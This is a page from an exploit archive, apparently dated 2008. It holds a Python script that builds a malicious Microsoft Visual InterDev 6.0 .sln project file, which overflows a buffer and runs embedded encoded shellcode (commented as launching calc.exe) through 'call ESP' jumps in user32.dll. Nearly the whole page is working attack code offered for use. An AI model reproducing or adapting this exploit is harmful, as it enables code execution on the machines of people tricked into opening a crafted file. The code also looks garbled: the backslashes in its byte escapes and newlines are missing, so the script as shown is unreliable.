Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit
# Published : 2008-01-11
# Author : shinnai
# Previous Title : Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)
# Next Title : CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit

#usage: exploit.py FileName

import sys

print "------------------------------------------------------------------------"
print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.orgn"
print " I really have much fun exploiting this one :)"
print " We need to patch five exceptions before we can have EIP:n"
print " #7C80A268   8801             MOV BYTE PTR DS:[ECX],AL"
print " #ECX 42424242      <--       to patch with jumper 0x7E3FBEFF"
print "------------------------------------------------------------------------"

buff      = "A" * 1764

jumper    = "xFFxBEx3Fx7E" #call ESP from user32.dll

buff2     = "A" * 4

buff3     = "A" * 24

buff4     = "A" * 16

buff5     = "A" * 4

nop       = "x90x90x90x90"

shellcode = 
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"

#execute calc.exe

buff6     = "A" * 8

get_EIP   = "xFFxB9x3Fx7E" #call EBP from user32.dll

buff7     = "A" * 56

try:
    sln_file = 
        'Microsoft Visual Studio Solution File, Format Version 1.00n'+
        'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '"n'+
	'EndProjectn'+
        'Globaln'+
        '	GlobalSection(LocalDeployment) = postSolutionn'+
        '		StartupProject = {00000000-0000-0000-0000-000000000000}n'+
        '	EndGlobalSectionn'+
        '	GlobalSection(BuildOrder) = postSolutionn'+
        '		0 = {00000000-0000-0000-0000-000000000000}n'+
        '	EndGlobalSectionn'+
        '	GlobalSection(DeploymentRoot) = postSolutionn'+
        '	EndGlobalSectionn'+
        'VersionCompanyName="xxx"n'+
        'EndGlobal'
    
    out_file = open(sys.argv[1] + ".sln",'w')
    out_file.write(sln_file)
    out_file.close()
    print "nFILE CREATION COMPLETED!n"
except:
    print " n -------------------------------------"
    print "  Usage: exploit.py FileName"
    print " -------------------------------------"
    print "nAN ERROR OCCURS DURING FILE CREATION!"

# www.Syue.com [2008-01-11]